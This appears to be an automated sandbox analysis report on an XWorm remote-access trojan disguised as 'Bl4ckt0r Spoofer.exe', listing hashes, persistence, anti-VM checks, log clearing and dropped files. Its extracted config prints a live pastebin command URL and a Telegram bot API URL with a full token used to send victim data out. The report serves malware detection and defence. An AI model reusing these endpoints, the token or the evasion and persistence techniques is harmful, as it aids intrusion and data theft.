Analysis
-
max time kernel
900s -
max time network
900s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
07/03/2025, 04:12
Behavioral task
behavioral1
Sample
Bl4ckt0r Spoofer.exe
Resource
win10v2004-20250217-en
General
-
Target
Bl4ckt0r Spoofer.exe
-
Size
4.5MB
-
MD5
3e3c214efbec069174605c064553a06f
-
SHA1
b649ff5a76ce6271e7c0590a9896e0754b5e08ce
-
SHA256
22c3413fc8c1f3d0893b3f14b231f934e92ac9008611a673e80a951af4cf6da4
-
SHA512
b22d8f2630bbd2002f715ccd460e3b25c7ce972de97b7c611786ca575db10aa95072dc551b6b5dc0c24a61b919f2912d6e96240160b5b2c5900cedd55512a744
-
SSDEEP
98304:HZK5TELYAim4gThP3Ja8MBgeq5oYyEzqNIqH17yZ0NrnjN8EHDzzs33nlbv6:HZK5gLYAiclrl5jTeDV7y4nR8iXsnl
Malware Config
Extracted
xworm
-
Install_directory
%AppData%
-
install_file
x69XClient.exe
-
pastebin_url
https://pastebin.com/raw/7KHrn9yR
-
telegram
https://api.telegram.org/bot7600824685:AAHOEzTxziP7s4Wf095smbzn6FrkvRgCwVk/sendMessage?chat_id=7600824685
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000200000001e723-82.dat family_xworm behavioral1/memory/1940-93-0x0000000000E00000-0x0000000000E16000-memory.dmp family_xworm -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1704 created 612 1704 powershell.EXE 5 -
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Bl4ckt0r Spoofer.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ x69M5tLLoveYOU (1) (1).exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 424 2824 chrome.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe -
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Bl4ckt0r Spoofer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Bl4ckt0r Spoofer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion x69M5tLLoveYOU (1) (1).exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion x69M5tLLoveYOU (1) (1).exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation Bl4ckt0r Spoofer.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation x69M5tLLoveYOU (1) (1).exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation x69s.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69XClient.lnk x69s.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69XClient.lnk x69s.exe -
Executes dropped EXE 21 IoCs
pid Process 3692 x69M5tLLoveYOU (1) (1).exe 1100 Install.exe 1940 x69s.exe 2264 x69XClient.exe 6692 processhacker-2.39-setup.exe 4080 processhacker-2.39-setup.tmp 8116 ProcessHacker.exe 6760 x69XClient.exe 1164 x69XClient.exe 6136 x69XClient.exe 6712 x69XClient.exe 4744 x69XClient.exe 6124 x69XClient.exe 5352 x69XClient.exe 6284 x69XClient.exe 6644 x69XClient.exe 7860 x69XClient.exe 5648 x69XClient.exe 8180 x69XClient.exe 7220 x69XClient.exe 4936 x69XClient.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx svchost.exe -
Loads dropped DLL 12 IoCs
pid Process 8116 ProcessHacker.exe 8116 ProcessHacker.exe 8116 ProcessHacker.exe 8116 ProcessHacker.exe 8116 ProcessHacker.exe 8116 ProcessHacker.exe 8116 ProcessHacker.exe 8116 ProcessHacker.exe 8116 ProcessHacker.exe 8116 ProcessHacker.exe 8116 ProcessHacker.exe 8116 ProcessHacker.exe -
resource yara_rule behavioral1/memory/4044-0-0x0000000000400000-0x0000000000C31000-memory.dmp themida behavioral1/memory/4044-2-0x0000000000400000-0x0000000000C31000-memory.dmp themida behavioral1/files/0x0007000000000749-10.dat themida behavioral1/memory/3692-47-0x0000000000400000-0x0000000000A4A000-memory.dmp themida behavioral1/memory/4044-18-0x0000000000400000-0x0000000000C31000-memory.dmp themida behavioral1/memory/3692-92-0x0000000000400000-0x0000000000A4A000-memory.dmp themida -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69XClient = "C:\\Users\\Admin\\AppData\\Roaming\\x69XClient.exe" x69s.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA x69M5tLLoveYOU (1) (1).exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Bl4ckt0r Spoofer.exe -
pid Process 1704 powershell.EXE -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs
flow ioc 693 pastebin.com 724 pastebin.com 767 pastebin.com 98 pastebin.com 677 pastebin.com 734 pastebin.com 745 pastebin.com 788 pastebin.com 836 pastebin.com 650 pastebin.com 659 pastebin.com 749 pastebin.com 777 pastebin.com 791 pastebin.com 830 pastebin.com 45 pastebin.com 632 pastebin.com 646 pastebin.com 670 pastebin.com 723 pastebin.com 786 pastebin.com 808 pastebin.com 834 pastebin.com 588 pastebin.com 645 pastebin.com 679 pastebin.com 737 pastebin.com 750 pastebin.com 604 pastebin.com 696 pastebin.com 720 pastebin.com 744 pastebin.com 760 pastebin.com 809 pastebin.com 843 pastebin.com 64 pastebin.com 838 pastebin.com 36 pastebin.com 715 pastebin.com 780 pastebin.com 814 pastebin.com 743 pastebin.com 628 pastebin.com 820 pastebin.com 735 pastebin.com 810 pastebin.com 313 pastebin.com 641 pastebin.com 651 pastebin.com 667 pastebin.com 797 pastebin.com 847 pastebin.com 635 pastebin.com 709 pastebin.com 835 pastebin.com 608 pastebin.com 669 pastebin.com 684 pastebin.com 739 pastebin.com 844 pastebin.com 848 pastebin.com 631 pastebin.com 655 pastebin.com 711 pastebin.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Drops file in System32 directory 17 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Tasks\x69XClient svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 OfficeClickToRun.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4044 Bl4ckt0r Spoofer.exe 3692 x69M5tLLoveYOU (1) (1).exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1704 set thread context of 2608 1704 powershell.EXE 106 -
Drops file in Program Files directory 46 IoCs
description ioc Process File created C:\Program Files\Process Hacker 2\plugins\is-JRBHT.tmp processhacker-2.39-setup.tmp File opened for modification C:\Program Files\Process Hacker 2\plugins\ExtendedServices.dll processhacker-2.39-setup.tmp File opened for modification C:\Program Files\Process Hacker 2\plugins\ToolStatus.dll processhacker-2.39-setup.tmp File created C:\Program Files\Process Hacker 2\is-8LSLV.tmp processhacker-2.39-setup.tmp File created C:\Program Files\Process Hacker 2\is-B9AQI.tmp processhacker-2.39-setup.tmp File created C:\Program Files\Process Hacker 2\plugins\is-NOUH7.tmp processhacker-2.39-setup.tmp File opened for modification C:\Program Files\Process Hacker 2\plugins\NetworkTools.dll processhacker-2.39-setup.tmp File opened for modification C:\Program Files\Process Hacker 2\plugins\Updater.dll processhacker-2.39-setup.tmp File opened for modification C:\Program Files\Process Hacker 2\plugins\UserNotes.dll processhacker-2.39-setup.tmp File created C:\Program Files\Process Hacker 2\is-T8N88.tmp processhacker-2.39-setup.tmp File opened for modification C:\Program Files\Process Hacker 2\unins000.dat processhacker-2.39-setup.tmp File opened for modification C:\Program Files\Crashpad\metadata setup.exe File opened for modification C:\Program Files\Process Hacker 2\plugins\HardwareDevices.dll processhacker-2.39-setup.tmp File opened for modification C:\Program Files\Process Hacker 2\plugins\SbieSupport.dll processhacker-2.39-setup.tmp File created C:\Program Files\Process Hacker 2\plugins\is-M2878.tmp processhacker-2.39-setup.tmp File created C:\Program Files\Process Hacker 2\plugins\is-9M2PV.tmp processhacker-2.39-setup.tmp File created C:\Program Files\Process Hacker 2\plugins\is-D7NBM.tmp processhacker-2.39-setup.tmp File opened for modification C:\Program Files\Crashpad\settings.dat setup.exe File opened for modification C:\Program Files\Process Hacker 2\plugins\ExtendedNotifications.dll processhacker-2.39-setup.tmp File opened for modification C:\Program Files\Process Hacker 2\x86\plugins\DotNetTools.dll processhacker-2.39-setup.tmp File opened for modification C:\Program Files\Process Hacker 2\x86\ProcessHacker.exe processhacker-2.39-setup.tmp File created C:\Program Files\Process Hacker 2\unins000.dat processhacker-2.39-setup.tmp File created C:\Program Files\Process Hacker 2\plugins\is-F62E6.tmp processhacker-2.39-setup.tmp File opened for modification C:\Program Files\Process Hacker 2\uninstall.ico RuntimeBroker.exe File opened for modification C:\Program Files\Process Hacker 2\plugins\OnlineChecks.dll processhacker-2.39-setup.tmp File created C:\Program Files\Process Hacker 2\is-T5LLO.tmp processhacker-2.39-setup.tmp File created C:\Program Files\Process Hacker 2\is-1MBPC.tmp processhacker-2.39-setup.tmp File created C:\Program Files\Process Hacker 2\x86\is-PPJO7.tmp processhacker-2.39-setup.tmp File created C:\Program Files\Process Hacker 2\plugins\is-5GDH6.tmp processhacker-2.39-setup.tmp File created C:\Program Files\Process Hacker 2\plugins\is-TH4U2.tmp processhacker-2.39-setup.tmp File created C:\Program Files\Process Hacker 2\plugins\is-B7CHR.tmp processhacker-2.39-setup.tmp File opened for modification C:\Program Files\Process Hacker 2\ProcessHacker.exe processhacker-2.39-setup.tmp File opened for modification C:\Program Files\Process Hacker 2\peview.exe processhacker-2.39-setup.tmp File opened for modification C:\Program Files\Process Hacker 2\plugins\ExtendedTools.dll processhacker-2.39-setup.tmp File created C:\Program Files\Process Hacker 2\is-VC5DQ.tmp processhacker-2.39-setup.tmp File created C:\Program Files\Process Hacker 2\plugins\is-UDDAM.tmp processhacker-2.39-setup.tmp File created C:\Program Files\Process Hacker 2\x86\plugins\is-K2QRM.tmp processhacker-2.39-setup.tmp File created C:\Program Files\Process Hacker 2\plugins\is-HOTV2.tmp processhacker-2.39-setup.tmp File created C:\Program Files\Process Hacker 2\is-GT4OE.tmp processhacker-2.39-setup.tmp File opened for modification C:\Program Files\Process Hacker 2\plugins\DotNetTools.dll processhacker-2.39-setup.tmp File created C:\Program Files\Process Hacker 2\is-IBA1I.tmp processhacker-2.39-setup.tmp File created C:\Program Files\Process Hacker 2\plugins\is-0G5HN.tmp processhacker-2.39-setup.tmp File opened for modification \??\c:\program files\process hacker 2\uninstall.ico RuntimeBroker.exe File opened for modification C:\Program Files\Process Hacker 2\plugins\WindowExplorer.dll processhacker-2.39-setup.tmp File created C:\Program Files\Process Hacker 2\is-PTFST.tmp processhacker-2.39-setup.tmp File created C:\Program Files\Process Hacker 2\is-2HD9U.tmp processhacker-2.39-setup.tmp -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language processhacker-2.39-setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language processhacker-2.39-setup.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bl4ckt0r Spoofer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x69M5tLLoveYOU (1) (1).exe -
Checks SCSI registry key(s) 3 TTPs 21 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe -
Checks processor information in registry 2 TTPs 23 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz ProcessHacker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ProcessHacker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018401296332489 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb010000004323056123d1c04da7710f37ab47d227000000000200000000001066000000010000200000004aa4bbf04a977b035377cde51efbdd3dcdddc7a86ef007367a70dc8676dcefad000000000e8000000002000020000000fbdce38253c58173878edc2b4c582b65d03acbfbd7d372c26f7d3766426bce96800000009dde748ed0fefd1fcaa717e6b7c28114695092403f32b7a52b20b08efb13bac788b1d663d901787e609efae60f1fa85f83cfd7ed5a157307d014ab37b559c5fe8606f86e37d5d1864dfaef3777709d12f9e601cf338fafc47109f875f77fd469d6f8201773c31fb93b3a11eee5cab871c9d5411795b570ac1ea833058907b95540000000cdffae012cd49dc6ccca4f0a7c7d5a1a91c19f1608bfbaea43c71909ca301f7cb4b05c22b9894ee869aecb6bde8d0b7ecc482566a184e26e7a3e21a4c9a84cf5 mousocoreworker.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133857944468672597" chrome.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1741320882" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Fri, 07 Mar 2025 04:14:43 GMT" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 